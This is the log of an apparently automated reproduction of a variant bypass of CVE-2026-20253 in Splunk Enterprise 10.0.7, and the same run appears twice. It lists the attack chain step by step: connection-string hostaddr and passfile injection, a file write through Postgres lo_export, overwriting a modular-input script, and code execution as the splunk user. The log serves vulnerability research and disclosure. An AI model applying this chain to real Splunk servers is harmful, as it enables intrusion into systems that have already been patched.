[20:09:01] Pulling images (idempotent)... [+] PASS: images present [20:09:01] Creating Docker network and attacker-controlled Postgres... [+] PASS: attacker-pg-v ready [+] PASS: malicious attacker DB loaded (pwn() + pwn_variant() + CHECK constraints + trigger rows) [20:09:12] attacker-pg-v IP on splunknet_variant: 172.21.0.2 [20:09:12] Starting FIXED Splunk Enterprise 10.0.7 (bypass target)... [+] PASS: splunk-fixed-v healthy [20:09:53] Waiting for fixed build sidecar endpoint to register... [+] PASS: fixed sidecar ready (HTTP 401) after 15s [20:10:03] fixed .pgpass path: /opt/splunk/var/packages/data/postgres/db/.pgpass [20:10:03] original fixed ssg_enable_modular_input.py lines: 83 [20:10:03] ======================================== [20:10:04] === VARIANT BYPASS: Authenticated chain on FIXED 10.0.7 === [20:10:04] ======================================== [20:10:04] Step 1: Authenticate to fixed build [+] PASS: Splunk token obtained (length 118) [20:10:04] Step 2: Verify fix blocks unauthenticated access (negative control) [20:10:04] Unauthenticated backup on fixed: HTTP=401 body=Authorization header must use Splunk token [+] PASS: NEGATIVE CONTROL: fixed build blocks unauthenticated access (401) [20:10:04] Step 3: Authenticated backup of malicious attacker DB (hostaddr injection) [20:10:04] Backup: HTTP=200 id=hostaddr=172.21.0.2 dbname=testdb-20260707T201004Z-25288862-a6bc-4ba3-b544-05e1c54c9981.dump [20:10:04] Backup final state: BackupComplete [+] PASS: VARIANT Step 3: authenticated backup of attacker DB succeeded on FIXED build (hostaddr injection not sanitized) [20:10:04] Step 4: Authenticated restore with passfile injection (lo_export trigger) [20:10:04] Restore: HTTP=200 id=644bc4dd-dbf9-49ce-8316-f4fb1a1c6e47 [20:10:04] Restore final state: RestoreFailed (note: pg_restore exits 1 on non-fatal --clean errors but lo_export fires before exit) [20:10:04] Step 5: Check for variant bypass proof file (arbitrary file write) [20:10:06] Variant proof file exists: yes [20:10:06] Variant proof content: CVE-2026-20253 VARIANT BYPASS CONFIRMED File written via lo_export on FIXED 10.0.7 build database connection string injection still works [+] PASS: VARIANT Step 5: arbitrary file write confirmed on FIXED build via lo_export [20:10:06] Step 6: Wait for RCE (modular-input scheduler executes overwritten script) [20:10:06] Fixed /opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_enable_modular_input.py now 3 lines, first line: import os,sys [+] PASS: VARIANT Step 6: modular-input script overwritten with attacker payload on FIXED build [20:10:06] Waiting for Splunk modular-input scheduler to execute the overwritten script... [20:10:36] RCE MARKER appeared: | CVE-2026-20253 VARIANT RCE on FIXED 10.0.7 | uid=41812(splunk) gid=41812(splunk) groups=41812(splunk),999(ansible) [+] PASS: VARIANT Step 6: RCE confirmed on FIXED build - attacker code executed as splunk user [20:10:36] ======================================== [20:10:36] === Control: Original unauthenticated chain on VULNERABLE 10.0.6 === [20:10:36] ======================================== [+] PASS: splunk-vuln-v healthy [+] PASS: vulnerable sidecar ready (400 Failed to decode) after 15s [20:11:27] Vulnerable unauth backup: HTTP=401 (expect 200 - no auth required) [!] FAIL: Control: vulnerable build did not allow unauthenticated backup (HTTP 401) [20:11:27] ================ VARIANT SUMMARY ================ [20:11:27] Negative control (fixed blocks unauth): true [20:11:27] Control (vuln allows unauth): false [20:11:27] Variant backup (hostaddr injection): true [20:11:27] Variant file write (lo_export): true [20:11:27] Variant RCE (splunk user): true [20:11:27] Runtime manifest written to /data/pruva/runs/b62e307f-d4bc-4620-8dec-d71751962348/bundle/vuln_variant/runtime_manifest.json [20:11:27] Variant reproduction complete. [20:11:47] Pulling images (idempotent)... [+] PASS: images present [20:11:47] Creating Docker network and attacker-controlled Postgres... [+] PASS: attacker-pg-v ready [+] PASS: malicious attacker DB loaded (pwn() + pwn_variant() + CHECK constraints + trigger rows) [20:11:57] attacker-pg-v IP on splunknet_variant: 172.21.0.2 [20:11:58] Starting FIXED Splunk Enterprise 10.0.7 (bypass target)... [+] PASS: splunk-fixed-v healthy [20:12:28] Waiting for fixed build sidecar endpoint to register... [+] PASS: fixed sidecar ready (HTTP 401) after 25s [20:12:49] fixed .pgpass path: /opt/splunk/var/packages/data/postgres/db/.pgpass [20:12:49] original fixed ssg_enable_modular_input.py lines: 83 [20:12:49] ======================================== [20:12:49] === VARIANT BYPASS: Authenticated chain on FIXED 10.0.7 === [20:12:49] ======================================== [20:12:49] Step 1: Authenticate to fixed build [+] PASS: Splunk token obtained (length 116) [20:12:49] Step 2: Verify fix blocks unauthenticated access (negative control) [20:12:49] Unauthenticated backup on fixed: HTTP=401 body=Authorization header must use Splunk token [+] PASS: NEGATIVE CONTROL: fixed build blocks unauthenticated access (401) [20:12:49] Step 3: Authenticated backup of malicious attacker DB (hostaddr injection) [20:12:49] Backup: HTTP=200 id=hostaddr=172.21.0.2 dbname=testdb-20260707T201249Z-42e80afb-4433-41a8-be54-ce30f6c67b19.dump [20:12:49] Backup final state: BackupComplete [+] PASS: VARIANT Step 3: authenticated backup of attacker DB succeeded on FIXED build (hostaddr injection not sanitized) [20:12:49] Step 4: Authenticated restore with passfile injection (lo_export trigger) [20:12:49] Restore: HTTP=200 id=77c1e57e-a61a-45c8-beba-0459eaa38977 [20:12:49] Restore final state: RestoreFailed (note: pg_restore exits 1 on non-fatal --clean errors but lo_export fires before exit) [20:12:49] Step 5: Check for variant bypass proof file (arbitrary file write) [20:12:51] Variant proof file exists: yes [20:12:51] Variant proof content: CVE-2026-20253 VARIANT BYPASS CONFIRMED File written via lo_export on FIXED 10.0.7 build database connection string injection still works [+] PASS: VARIANT Step 5: arbitrary file write confirmed on FIXED build via lo_export [20:12:51] Step 6: Wait for RCE (modular-input scheduler executes overwritten script) [20:12:52] Fixed /opt/splunk/etc/apps/splunk_secure_gateway/bin/ssg_enable_modular_input.py now 3 lines, first line: import os,sys [+] PASS: VARIANT Step 6: modular-input script overwritten with attacker payload on FIXED build [20:12:52] Waiting for Splunk modular-input scheduler to execute the overwritten script... [20:13:22] RCE MARKER appeared: | CVE-2026-20253 VARIANT RCE on FIXED 10.0.7 | uid=41812(splunk) gid=41812(splunk) groups=41812(splunk),999(ansible) [+] PASS: VARIANT Step 6: RCE confirmed on FIXED build - attacker code executed as splunk user [20:13:22] ======================================== [20:13:22] === Control: Original unauthenticated chain on VULNERABLE 10.0.6 === [20:13:22] ======================================== [+] PASS: splunk-vuln-v healthy [+] PASS: vulnerable sidecar ready (400 Failed to decode) after 25s [20:14:13] Vulnerable unauth backup: HTTP=400 (expect 200 - no auth required) [!] FAIL: Control: vulnerable build did not allow unauthenticated backup (HTTP 400) [20:14:13] ================ VARIANT SUMMARY ================ [20:14:13] Negative control (fixed blocks unauth): true [20:14:13] Control (vuln allows unauth): false [20:14:13] Variant backup (hostaddr injection): true [20:14:13] Variant file write (lo_export): true [20:14:13] Variant RCE (splunk user): true [20:14:13] Runtime manifest written to /data/pruva/runs/b62e307f-d4bc-4620-8dec-d71751962348/bundle/vuln_variant/runtime_manifest.json [20:14:13] Variant reproduction complete.